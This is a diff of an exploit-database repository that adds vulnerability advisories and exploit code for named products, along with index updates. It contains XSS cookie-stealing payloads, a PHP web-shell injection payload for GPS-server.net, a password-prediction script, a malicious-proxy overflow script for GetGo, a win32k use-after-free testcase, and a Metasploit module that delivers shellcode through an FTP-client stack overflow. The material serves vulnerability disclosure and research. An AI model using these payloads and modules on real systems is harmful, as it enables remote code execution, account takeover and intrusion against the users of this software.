James Bercegay of the GulfTech Security Research Team.

59
exploits/multiple/webapps/43444.txt Normal file
View file

@ -0,0 +1,59 @@
Max Web Portal Multiple Vulnerabilities
Vendor: Max Web Portal
Product: Max Web Portal
Version: <= 1.30
Website: http://www.maxwebportal.com
BID: 7837
Description:
MaxWebPortal is a web portal and online community system which includes advanced features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. Easy-to-use and powerful user interface allows members to add news, content, write reviews and share information among other registered users.
Search XSS Vulnerability:
The Max Web Portal search utility is vulnerable to cross site scripting attacks. All an attacker has to do is break out of the input tags and enter thier code of choice such as JS or VBS. Below is an example of this vulnerability.
search.asp?Search="><script>alert(document.cookie)</script>
Remember this vuln as I will later explain how it can be used to aide an attacker to compromise user and admin accounts.
Hidden Form Field weakness:
The Max Web Portal system seems to rely on hidden form fields quite heavily. This is not really a problem if done securely. However any user can perform some admin actions by exploiting the use of these hidden fields. For example, and attacker can deface a Max Web Portal site by clicking the link to start a new topic, saving the html file offline, and making a few changes. By adding the following to the form any post an attacker makes will show up on the front page as a news item. (credits to pivot for finding this one :) )
A field with value=1 name=news
And this will also lock the topic
A field with name="lock" value="1"
Unfortunately this vuln can also be exploited by the scum of the earth (spammers :( ) Below is an example of how a user can send a private message to all members of the particular Max Web Portal driven site
A field with name="allmem" value="true"
There may be other vulns like this that can be exploited. We however quit bothering with looking after these were found. heh
Cookie Authentication Bypass Vulnerability:
Now this is where the earlier XSS vuln could come in very handy to an attacker. Basically, by changing certain values in the cookie file of a Max Portal Website an attacker can assume the identity of anyone, even an admin. This however is only possible if you have the encrypted password of a user. But by using the above XSS vuln or other methods, this can be accomplished quite easily. All an attacker has to do is login as thierselves to obtain a valid sessionid. Then without logging out, close the browser and change thier name and encrypted pass in the cookie to that of the identity they wish to assume. When they return to the site it will then recognize them as the compromised user.
Database Compromise Vulnerability:
This is taken directly from the Max Web Portal readme file explaining the recommended post installation procedure.
"Remember to change the default admin password by clicking on the Profile link in your Control Panel. For additional security, it is recommended to change your database name. example: neptune.mdb"
This is not safe as anyone with a CGI scanner can modify thier list to find a Max Web Portal database. By default the database is located at this url
/database/db2000.mdb
And while it should be removed and placed in a non accessible directory, alot of times it isn't :( This is definately serious, as you do not need to decrypt the pass for it to be any use to you, as I demonstrated earlier.
Password Reset Vulnerability:
This is by far the most serious vuln of them all. While the cookie poisioning vuln will let you log in as anyone, your access is somewhat limited. However, by requesting a forgotten password, an attacker can then save the password reset page offline, edit the member id in the source code to the id number of the desired victim, and reset thier password to one of thier liking, no questions asked. Here is an modified example.
MaxWebPortal Proof of Concept Exploit
This leads to total compromise of the webportal system. An attacker can even write a script in a matter of minutes to reset the entire database to a pass of thier liking. I wrote a script like this during the research of this product but will not be releasing it to the public as im sure it will only be abused.
Solution:
Upgrade to version v3.4.04 or higher
Credits:
James Bercegay of the GulfTech Security Research Team.

32
exploits/multiple/webapps/43445.txt Normal file
View file

@ -0,0 +1,32 @@
Snitz Forums 2000 Multiple Vulnerabilities
Vendor: Snitz Communications
Product: Snitz Forums 2000
Version: <= 3.4.0.3
Website: http://www.snitz.com
BID: 7922 7924 7925
CVE: CAN-2003-0492 CAN-2003-0493 CAN-2003-0494
Description:
Snitz Forums is a full-featured UBB-style ASP discussion board application. New features in version 3.3: Complete Topic/Post Moderation, Topic Archiving, Subscribe to Board / Category / Forum / Topic, Improved unsubscribe, Short(er) urls, Category and Forum ordering, and Improved Members-page. And like always, upgrading of the database is done for you by the setupscript
Search XSS Vulnerability:
Snitz search feature is vulnerable to XSS which can aide an attacker in stealing cookies, and thus compromising the account, as described below
search.asp?Search="><script>alert(document.cookie)</script>
Cookie Authentication Bypass Vulnerability:
In order to steal another users identity, all an attacker needs to know is thier encrypted password. This is not very hard to obtain using the XSS as described above, or other methods. Once an attacker has this info, all they have to do is login to thier normal account to get a valid session id, close the browser, replace thier username and encrypted pass with that of the victim, and return to the site where they will be recognized as the victim.
Password Reset Vulnerability:
This is the most serious of the vulns, as it requries no real effort and leaves the entire snitz forum open to attack. All an attacker has to do is request a forgotten password, save the password reset page offline,edit the member id to the desired member id, and submit the form. The members password will then be reset to that of the attackers choosing.
Proof Of Concept:
Snitz Forums 2000 Proof Of Concept
Solution:
Upgrade to version v3.4.04 or higher
Credits:
James Bercegay of the GulfTech Security Research Team.

8
exploits/php/webapps/1077.pl
View file

@ -201,10 +201,10 @@ if ( $res->content =~ /<strong>(.*)\.php<\/strong>/i )
# Quick and dirty way to fix the data recieved
# so that it executes and does not cause error
$data =~ s/&gt;/>/ig;
$data =~ s/&lt;/</ig;
$data =~ s/&quot;/"/ig;
$data =~ s/&amp;/&/ig;
$data =~ s/>/>/ig;
$data =~ s/</</ig;
$data =~ s/"/"/ig;
$data =~ s/&/&/ig;

89
exploits/php/webapps/43431.txt Normal file
View file

@ -0,0 +1,89 @@
# Exploit Title: GPS-SERVER.NET SAAS CMS <=3.0 Multiple Vulnerabilities
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.gps-server.net/
# Software Link: http://www.gps-server.net/
# Version: <=3.0
# Tested on: Linux and Windows
# CVE : CVE-2017-17097, CVE-2017-17098
GPS-SERVER.NET SAAS CMS Version <=3.0 Suffers from multiple vulnerabilities
which results in complete takeover of the target remotely.
1. Remote Code Injection (Works until version 3.0)
The writeLog function in fn_common.php in gps-server.net GPS Tracking
Software (self hosted) through 3.0 allows remote attackers to inject
arbitrary PHP code via a crafted request that is mishandled during admin
log viewing. Login, signup and other common incidents are logged into a PHP
file in /logs/ directory with the given input. For example an attacker can
use PHP code in password recovery mode instead of email which will be
injected into the PHP log file.
Demo:
Go to the vulnerable site
Click recover tab
Give following code in email field, fill captcha and click submit
<?php system($_GET[cmd]); ?>
Unfortunately each and every POST request in the CMS is going through
function mysql_real_escape_string() which will add slashes behind every
quote in the payload. So you have to make sure your payload doesn't contain
any quote. Fortunately, PHP is flexible enough to allow a string without
having quotes as you can see in above payload it doesn't contain quotes
around "cmd" but it still works. The shell can then be collected from here
https://localhost/logs/YYYY_MM_user_access.php
YYYY=Current Year
MM=Current Month
Use the payload carefully. If you messed it up, PHP log file will get
corrupted and then wait until next month so CMS generates a new log file
for you :)
Unfortunately the header of log files only allows admin session to access
log data which makes it less of a RCE. Code will only be executed if admin
checks the log files. But fortunately there is another vulnerability
(explained below) which allows an attacker to hijack admin's account hence
making the RCE exploitable with 100% success.
2. Password Reset Vulnerability (Tested upto version 2.7)
gps-server.net GPS Tracking Software (self hosted) 2.x has a password reset
procedure that immediately resets passwords upon an unauthenticated
request, and then sends e-mail with a predictable (date-based) password to
the admin, which makes it easier for remote attackers to obtain access by
predicting this new password. This is related to the use of gmdate()
function for password creation in fn_connect.php.
Demo:
Go to the vulnerable site
Click recover tab
Input admin's email, fill captcha and click submit. Now execute following
PHP code on your local machine immediately.
<?php
for($seconds=-10;$seconds<10;$seconds++){
echo substr(hash('sha1',gmdate('d F Y G i s u',
time()+$seconds)),0,6).'<br>';
}
?>
Submitting password reset form and executing above should be done parallel
to predict password as close as possible. Unfortunately i couldn't make
full remote exploit because of the captcha in the password reset form. This
code will predict possible 20 passwords generated in 20 seconds. It might
not be possible to have synchronized timing on your local machine and
target's server so this code generates 20 passwords (10 before actual time
and 10 after). Set your local machine's time as accurate as you can to get
the perfect combo :)
Password reset vulnerability is tested up to version 2.7 but doesn't work
on version 3.0 which means it was fixed somewhere in between version 2.7
and 3.0 and since the CMS isn't open source so I can't say when it got
fixed (I only had source code of version 2.5.9 and 2.7). Even though the
reset vulnerability was patched unintentionally as developers added a
mid-step in password reset procedure. CMS sends password reset link to the
admin's email and password is only reset once admin clicks the link. Since
we don't know when admin is gonna click the link so we can't predict the
new password.
Mitigation: Update CMS to version 3.1
Give me feedback @nomanriffat :)

2
exploits/php/webapps/6307.txt
View file

@ -1,4 +1,4 @@
Crafty Syntax Live Help <= 2.14.6 SQL Injection
Crafty Syntax Live Help <= 2.14.6 SQL Injection
August 25, 2008
Vendor : Eric Gerdes

2
exploits/php/webapps/6822.txt
View file

@ -1,4 +1,4 @@
WebSVN <= 2.0 Multiple Vulnerabilities
WebSVN <= 2.0 Multiple Vulnerabilities
October 20, 2008
Vendor : Tim Armes

47
exploits/windows/dos/43432.py Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712
# Date: 01-02-2018
# Tested on Windows 8 64 bits
# Exploit Author: devcoinfet
# Contact: https://twitter.com/wabefet
# Software Link: http://www.getgosoft.com/getgodm/
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution
#to be vulnerable victim must have a proxy selected that will maliciously return data in response
#select proxy ip of host running this script incase You have vm running the software
#set port of proxy on getgo under proxy settings as well now when you download any page
#or any file the program incorrectly parses the response and passes request to malicious host triggering overlfow
default_evilbuffer = "A" * 7500
def main():
ip = "10.10.10.6"
port = 8055
fuzz_test(ip,default_evilbuffer,port)
def fuzz_test(ip,payload,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ip, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
print "[+] Pushing fuzz test to %s" % addr[0]
buffer = "HTTP/1.1 200 " + payload + "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending Fuzzed buffer From Mailicious Proxy: OK\n"
print "[+] Payload type Default Buffer of 7500 A's"
sleep(3)
cl.close()
s.close()
if __name__ == '__main__':
import socket
from time import sleep
main()

112
exploits/windows/dos/43446.txt Normal file
View file

@ -0,0 +1,112 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1389&desc=6
Windows maintains a DC cache in win32kbase!gpDispInfo->pdceFirst. If you create multiple windows from a shared class while switching between CS_OWNDC and CS_CLASSDC, you can cause cache list entries to maintain references to free WND structures.
There are two interesting background posts on CS_OWNDC and CS_CLASSDC here:
https://blogs.msdn.microsoft.com/oldnewthing/20060601-06/?p=31003
https://blogs.msdn.microsoft.com/oldnewthing/20060602-00/?p=30993
Here is a minimal testcase:
$ cat dccache.c
#include <windows.h>
#pragma comment(lib, "user32")
int main(int argc, char **argv) {
WNDCLASSEX WindowClass = {0};
HWND WindowA, WindowB, WindowC;
ATOM Atom;
WindowClass.cbSize = sizeof(WNDCLASSEX);
WindowClass.lpfnWndProc = DefWindowProc;
WindowClass.lpszClassName = "Class";
Atom = RegisterClassEx(&WindowClass);
WindowA = CreateWindowEx(0, MAKEINTATOM(Atom), "One", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC);
WindowB = CreateWindowEx(0, MAKEINTATOM(Atom), "Two", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
GetDC(WindowA);
SetClassLong(WindowA, GCL_STYLE, CS_CLASSDC | CS_OWNDC);
WindowC = CreateWindowEx(0, MAKEINTATOM(Atom), "Three", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, NULL, NULL);
return 0;
}
This might take a while to crash though, something has to cause the list to be traversed (e.g. a new window opens) after the freed memory has changed. It can also crash in some very strange places. We can speed the process up by trying to get the allocation ourselves.
First I need to know the size of a WND structure. If you look at the call to HMAllocObject() in win32kfull!xxxCreateWindowEx, you can see it's 240 bytes:
.text:00081BCC _xxxCreateWindowEx@68 proc near
...
.text:00081EE2 push 240 ; _DWORD
.text:00081EE7 push 1 ; _DWORD
.text:00081EE9 push [ebp+var_12C] ; _DWORD
.text:00081EEF push ebx ; _DWORD
.text:00081EF0 call ds:__imp__HMAllocObject@16 ; HMAllocObject(x,x,x,x)
A well-known trick to get arbitrary sized allocations from the desktop heap is to use SetWindowText(), you just create a WCHAR string of the required length - good enough for testing.
e.g. SetWindowTextW(Window, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...");
So my plan is to create a thread to trigger the free, and then try to steal the allocation. See the testcase attached for my code.
This reliably crashes Windows 10 with version 10.0.15063.674, the crash looks like this:
eax=00410041 ebx=00000010 ecx=95423580 edx=95423580 esi=99464440 edi=954004d0
eip=93fb40d8 esp=9dba78f0 ebp=9dba7910 iopl=0 nv up ei pl nz na pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207
win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba:
93fb40d8 8b403c mov eax,dword ptr [eax+3Ch] ds:0023:0041007d=????????
0: kd> kv
# ChildEBP RetAddr Args to Child
00 9dba7910 93fb2722 00000000 0c6775a3 9dba7b80 win32kfull!zzzLockDisplayAreaAndInvalidateDCCache+0xba (FPO: [Non-Fpo])
01 9dba7afc 93fd1916 0000c1ac 9dba7b74 00000000 win32kfull!xxxCreateWindowEx+0xb56 (FPO: [Non-Fpo])
02 9dba7bc8 81d97397 80000000 0000c1ac 0000c1ac win32kfull!NtUserCreateWindowEx+0x2b0 (FPO: [Non-Fpo])
03 9dba7bc8 77104350 80000000 0000c1ac 0000c1ac nt!KiSystemServicePostCall (FPO: [0,3] TrapFrame @ 9dba7c14)
04 0073f0b8 7497485a 74bae418 80000000 0000c1ac ntdll!KiFastSystemCallRet (FPO: [0,0,0])
05 0073f0bc 74bae418 80000000 0000c1ac 0000c1ac win32u!NtUserCreateWindowEx+0xa (FPO: [17,0,0])
06 0073f394 74badcff 0073f3e0 00000000 80000000 USER32!VerNtUserCreateWindowEx+0x22b (FPO: [Non-Fpo])
07 0073f468 74baeaf8 00cc1010 00000000 80000000 USER32!CreateWindowInternal+0x153 (FPO: [Non-Fpo])
08 0073f4a8 00cb1173 00000000 0000c1ac 00cc1010 USER32!CreateWindowExA+0x38 (FPO: [Non-Fpo])
So let's dump the DC Cache and see what it looks like, an entry looks something like:
typedef struct _DCE {
PDCE pdceNext;
HANDLE hDC;
PWND pwndOrg;
PWND pwndClip;
...
} DCE, *PDCE;
# Make $t0 gpDispInfo->pdceFirst
0: kd> r $t0=poi(poi(win32kbase!gpDispInfo)+8)
# Now dump the whole list:
0: kd> .while (@$t0) { .printf "dce %p ->pwndOrg %p\n",@$t0,poi(@$t0+8); r @$t0=poi(@$t0) }
dce 99464440 ->pwndOrg 95423580
dce 922140e8 ->pwndOrg 00000000
dce 9239d638 ->pwndOrg 00000000
dce 9239beb0 ->pwndOrg 00000000
dce 99510540 ->pwndOrg 9541ede8
dce 92274178 ->pwndOrg 954004d0
dce 9223d2b0 ->pwndOrg 954004d0
dce 922050e8 ->pwndOrg 945504d0
So my theory is that one of these WND pointers is actually a bad reference, and
look at this:
0: kd> du 95423580
95423580 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
954235c0 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
95423600 "AAAAAAAAAAA"
There is the text I set via SetWindowText().
(The testcase I sent Microsoft triggered a couple of other BSOD I want fixed as well. I'm hoping whoever gets assigned this bug will just fix them, they're dead easy oneline fixes).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43446.zip

108
exploits/windows/remote/43448.rb Executable file
View file

@ -0,0 +1,108 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Ayukov NFTP FTP Client Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP
Client 2.0 and earlier. By responding with a long string of data for the SYST request, it
is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote
code exeuction under the context of the user if successfully exploited.
},
'Author' =>
[
'Berk Cem Goksel', # Original exploit author
'Daniel Teixeira', # MSF module author
'sinn3r' # RCA, improved module reliability and user exp
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-15222'],
[ 'EDB', '43025' ],
],
'Payload' =>
{
'BadChars' => "\x00\x01\x0a\x10\x0d",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP3 English', { 'Ret' => 0x77f31d2f } ], # GDI32.dll v5.1.2600.5512
],
'Privileged' => false,
'DefaultOptions' =>
{
'SRVHOST' => '0.0.0.0',
},
'DisclosureDate' => 'Oct 21 2017',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
])
end
def exploit
srv_ip_for_client = datastore['SRVHOST']
if srv_ip_for_client == '0.0.0.0'
if datastore['LHOST']
srv_ip_for_client = datastore['LHOST']
else
srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
end
end
srv_port = datastore['SRVPORT']
print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
super
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
print_status("#{client.peerhost} - connected")
# Let the client log in
client.get_once
print_status("#{client.peerhost} - sending 331 OK")
user = "331 OK.\r\n"
client.put(user)
client.get_once
print_status("#{client.peerhost} - sending 230 OK")
pass = "230 OK.\r\n"
client.put(pass)
# It is important to use 0x20 (space) as the first chunk of the buffer, because this chunk
# is visible from the user's command prompt, which would make the buffer overflow attack too
# obvious.
sploit = "\x20"*4116
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << payload.encoded
sploit << Rex::Text.rand_text(15000 - 4116 - 4 - 16 - payload.encoded.length, payload_badchars)
sploit << "\r\n"
print_status("#{client.peerhost} - sending the malicious response")
client.put(sploit)
client.get_once
pwd = "257\r\n"
client.put(pwd)
client.get_once
end
end

154
files_exploits.csv
View file

@ -76,7 +76,7 @@ id,file,description,date,author,type,platform,port
433,exploits/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",dos,multiple,
463,exploits/windows/dos/463.c,"RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,dos,windows,
468,exploits/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service",2004-09-19,"Luigi Auriemma",dos,windows,
471,exploits/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",dos,windows,66
471,exploits/windows/dos/471.pl,"Emulive Server4 Build 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",dos,windows,66
474,exploits/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun (MS04-028)",2004-09-22,perplexy,dos,windows,
477,exploits/windows/dos/477.c,"PopMessenger 1.60 - Remote Denial of Service",2004-09-23,"Luigi Auriemma",dos,windows,8473
551,exploits/linux/dos/551.c,"MyServer 0.7.1 - 'POST' Denial of Service",2004-09-27,"Tom Ferris",dos,linux,
@ -2092,7 +2092,7 @@ id,file,description,date,author,type,platform,port
18188,exploits/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",dos,windows,
18200,exploits/windows/dos/18200.txt,"SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)",2011-12-05,LiquidWorm,dos,windows,
18196,exploits/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)",2011-12-03,Zune,dos,windows,
18199,exploits/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (Denial of Service)",2011-12-05,rigan,dos,hardware,
18199,exploits/hardware/dos/18199.pl,"D-Link DNS-320 ShareCenter - Remote Reboot/Shutdown/Reset (Denial of Service)",2011-12-05,rigan,dos,hardware,
18220,exploits/windows/dos/18220.py,"CyberLink (Multiple Products) - File Project Handling Stack Buffer Overflow (PoC)",2011-12-09,modpr0be,dos,windows,
18221,exploits/linux/dos/18221.c,"Apache - Denial of Service",2011-12-09,"Ramon de C Valle",dos,linux,
18223,exploits/windows/dos/18223.pl,"Free Opener - Local Denial of Service",2011-12-09,"Iolo Morganwg",dos,windows,
@ -3246,9 +3246,9 @@ id,file,description,date,author,type,platform,port
24597,exploits/multiple/dos/24597.txt,"Mozilla Browser 1.7.x - Non-ASCII Hostname Heap Overflow",2004-09-14,"Mats Palmgren & Gael Delalleau",dos,multiple,
24599,exploits/linux/dos/24599.txt,"CUPS 1.1.x - UDP Packet Remote Denial of Service",2004-09-15,"Alvaro Martinez Echevarria",dos,linux,
24605,exploits/windows/dos/24605.txt,"Microsoft Windows XP - 'explorer.exe .tiff' Image Denial of Service",2004-09-16,"Jason Summers",dos,windows,
24610,exploits/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service / Cross-Site Scripting",2004-09-17,"James Bercegay",dos,multiple,
24610,exploits/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service / Cross-Site Scripting",2004-09-17,"GulfTech Security",dos,multiple,
24618,exploits/windows/dos/24618.c,"Impressions Games Lords of the Realm III - Nickname Remote Denial of Service",2004-09-20,"Luigi Auriemma",dos,windows,
24619,exploits/cgi/dos/24619.txt,"EmuLive Server4 - Authentication Bypass / Denial of Service",2004-09-21,"James Bercegay",dos,cgi,
24619,exploits/cgi/dos/24619.txt,"EmuLive Server4 - Authentication Bypass / Denial of Service",2004-09-21,"GulfTech Security",dos,cgi,
24620,exploits/windows/dos/24620.c,"LeadMind Pop Messenger 1.60 - Illegal Character Remote Denial of Service",2004-09-21,"Luigi Auriemma",dos,windows,
24621,exploits/php/dos/24621.txt,"Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service",2004-09-21,"Marc Ruef",dos,php,
24635,exploits/windows/dos/24635.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)",2004-09-27,Coolio,dos,windows,
@ -5438,6 +5438,8 @@ id,file,description,date,author,type,platform,port
43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow (PoC)",2017-12-27,"Aloyce J. Makalanga",dos,windows,
43410,exploits/windows/dos/43410.py,"D3DGear 5.00 Build 2175 - Buffer Overflow",2017-12-31,bzyo,dos,windows,
43415,exploits/macos/dos/43415.txt,"Apple macOS - IOHIDSystem Kernel Read/Write",2018-01-01,Siguza,dos,macos,
43432,exploits/windows/dos/43432.py,"GetGo Download Manager 5.3.0.2712 - 'Proxy' Buffer Overflow",2018-01-05,devcoinfet,dos,windows,
43446,exploits/windows/dos/43446.txt,"Microsoft Windows win32k - Using SetClassLong to Switch Between CS_CLASSDC and CS_OWNDC Corrupts DC Cache",2018-01-05,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9244,6 +9246,7 @@ id,file,description,date,author,type,platform,port
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation",2018-01-03,mr_me,local,windows,
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure (PoC)",2018-01-03,multiple,local,multiple,
43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -13699,10 +13702,10 @@ id,file,description,date,author,type,platform,port
24407,exploits/windows/remote/24407.txt,"Microsoft Internet Explorer 6 - Resource Detection",2004-08-24,"GreyMagic Software",remote,windows,
24409,exploits/windows/remote/24409.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized Proxy Relay",2002-12-11,Texonet,remote,windows,
24413,exploits/windows/remote/24413.txt,"NullSoft Winamp 2.4 < 5.0.4 - '.wsz' Remote Code Execution",2004-07-26,anonymous,remote,windows,
24414,exploits/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant",2004-08-26,"GulfTech Security",remote,multiple,
24417,exploits/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Cross-Site Scripting",2004-09-30,"James Bercegay",remote,windows,
24418,exploits/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Cross-Site Scripting",2004-09-30,"James Bercegay",remote,windows,
24419,exploits/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",remote,windows,
24414,exploits/multiple/remote/24414.txt,"Keene Digital Media Server 1.0.2 - Directory Traversal",2004-08-26,"GulfTech Security",remote,multiple,
24417,exploits/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Cross-Site Scripting",2004-09-30,"GulfTech Security",remote,windows,
24418,exploits/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Cross-Site Scripting",2004-09-30,"GulfTech Security",remote,windows,
24419,exploits/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"GulfTech Security",remote,windows,
24460,exploits/windows/remote/24460.rb,"VMware OVF Tools - Format String (Metasploit) (1)",2013-02-06,Metasploit,remote,windows,
24434,exploits/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution (Metasploit)",2013-01-29,Metasploit,remote,multiple,
24444,exploits/php/remote/24444.rb,"DataLife Engine - 'preview.php' PHP Code Injection (Metasploit)",2013-02-01,Metasploit,remote,php,
@ -15886,6 +15889,10 @@ id,file,description,date,author,type,platform,port
43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware,
43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware,
43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,Metasploit,remote,linux,9876
43434,exploits/hardware/remote/43434.txt,"D-Link DNS-320 ShareCenter < 1.06 - Backdoor Access",2018-01-03,"GulfTech Security",remote,hardware,
43435,exploits/hardware/remote/43435.txt,"WDMyCloud < 2.30.165 - Multiple Vulnerabilities",2018-01-03,"GulfTech Security",remote,hardware,
43448,exploits/windows/remote/43448.rb,"Ayukov NFTP FTP Client 2.0 - Buffer Overflow (Metasploit)",2018-01-05,Metasploit,remote,windows,
43450,exploits/hardware/remote/43450.py,"Cisco IOS - Remote Code Execution",2018-01-05,"Artem Kondratenko",remote,hardware,
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -16196,7 +16203,7 @@ id,file,description,date,author,type,platform,port
1051,exploits/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",webapps,php,
1052,exploits/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,webapps,php,
1053,exploits/php/webapps/1053.pl,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)",2005-06-19,K-C0d3r,webapps,php,
1057,exploits/php/webapps/1057.pl,"Simple Machines Forum (SMF) 1.0.4 - 'modify' SQL Injection",2005-06-21,"James Bercegay",webapps,php,
1057,exploits/php/webapps/1057.pl,"Simple Machines Forum (SMF) 1.0.4 - 'modify' SQL Injection",2005-06-21,"GulfTech Security",webapps,php,
1058,exploits/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection",2005-06-21,RusH,webapps,php,
1059,exploits/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,webapps,php,
1060,exploits/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution",2005-06-21,RusH,webapps,php,
@ -16207,7 +16214,7 @@ id,file,description,date,author,type,platform,port
1070,exploits/asp/webapps/1070.pl,"ASPNuke 0.80 - 'article.asp' SQL Injection",2005-06-27,mh_p0rtal,webapps,asp,
1071,exploits/asp/webapps/1071.pl,"ASPNuke 0.80 - 'comment_post.asp' SQL Injection",2005-06-27,"Alberto Trivero",webapps,asp,
1076,exploits/php/webapps/1076.py,"phpBB 2.0.15 - 'highlight' PHP Remote Code Execution",2005-06-29,rattle,webapps,php,
1077,exploits/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",webapps,php,
1077,exploits/php/webapps/1077.pl,"WordPress 1.5.1.2 - 'xmlrpc' Interface SQL Injection",2005-06-30,"GulfTech Security",webapps,php,
